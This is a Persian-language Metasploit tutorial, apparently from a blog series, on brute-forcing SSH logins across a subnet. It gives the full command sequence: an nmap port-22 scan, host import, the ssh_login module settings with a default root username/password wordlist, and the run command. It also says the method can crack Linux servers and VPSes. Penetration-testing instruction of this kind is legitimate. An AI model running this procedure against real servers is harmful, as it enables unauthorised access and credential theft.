منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : ssh_login Auxiliary Module

سلام دوستان . قسمت هشتم از آموزش های متااسپلویت را در پیش رو داریم . در این قسمت با یک Auxiliary Modules در خصوص ssh آشنا خواهیم شد . روند کار به این صورت است که فایلی حاوی یوزر و یا پسورد ها را همراه با گروهی از آی پی ها در این Module مشخص می کنیم تا یوزر و پسورد های احتمالی بر روی تمامی IP ها تست و آزمایش شود . در واقع به کرک ssh روی گروه زیادی از سیستم ها می پردازیم .

لازم به ذکر است که از این روش می توان در کرک سرور و vps لینوکسی و یا حتی یونیکسی استفاده کرد .

توپولوژی فرضی شبکه :

OSLearn.ir_001

قبل از استفاده از این Module ابتدا با استفاده از nmap شبکه را روی پورت 22 اسکن می کنیم سپس خروجی اسکن رو در یک فایل xml ذخیره می کنیم . در نهایت آی پی هایی که پورت 22 روی آن ها باز است را به دیتابیس متااسپلویت منتقل می کنیم .

پس ابتدا لازم است :

nmap 192.168.94.0/24 -p 22 -oX /root/output.nmap.dir/nmap.port22.output.xml

OSLearn.ir_002

حال همان طور که در قسمت گذشته یاد گرفتیم این خروجی را به دیتابیس منتقل می کنیم . فقط توجه داشته باشید که در این اسکن سیستم خودمون هم در آخر اسکن شده و باید آن را از دیتابیس پاک کنیم . پس به شکل زیر عمل می کنیم :

msf > hosts -d 192.168.94.10

OSLearn.ir_003

حالا تارگت ها آماده ی استفاده هستند :)

اما برای فراخوانی این Module ابتدا به شکل زیر عمل خواهیم کرد :

msf > use auxiliary/scanner/ssh/ssh_login

مثل گذشته برای مشاهده ی اطلاعات جامع تر به شکل زیر عمل می کنیم :

msf auxiliary(ssh_login) > show options

پورت پیش فرض ssh بر روی 22 است اما اگر تارگتی خاص دارید و می دانید که پورت پیش فرض را تغییر داده است , لازم است که آن را به شکل زیر تعیین کنید :

msf auxiliary(ssh_login) > set RPORT 2323

ما در این سناریو پورت را بر روی 22 فرض می کنیم .

در مرحله ی بعد باید تارگت هایی که در بالا در دیتابیس ذخیره کرده ایم را به عنوان rhost به این Module معرفی کنیم . برای این منظور به شکل زیر عمل می کنیم :

msf auxiliary(ssh_login) > hosts -R

OSLearn.ir_004

برای این که خروجی ای تمیز تر داشته باشیم و فقط یوزر و پسورد های پیدا شده رو مشاهده کنیم , verbose را غیر فعال می کنیم :

msf auxiliary(ssh_login) > set VERBOSE false

در نهایت فایل حاوی username و password های احتمالی خودمون رو مشخص می کنیم :

msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

توجه داشته باشید که فایل بالا به طور پیش فرض بر روی کالی لینوکس موجود است .

در نهایت این Module را به شکل زیر اجرا می کنیم :

msf auxiliary(ssh_login) > run

OSLearn.ir_005

 

موفق و موید باشید .

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : , ,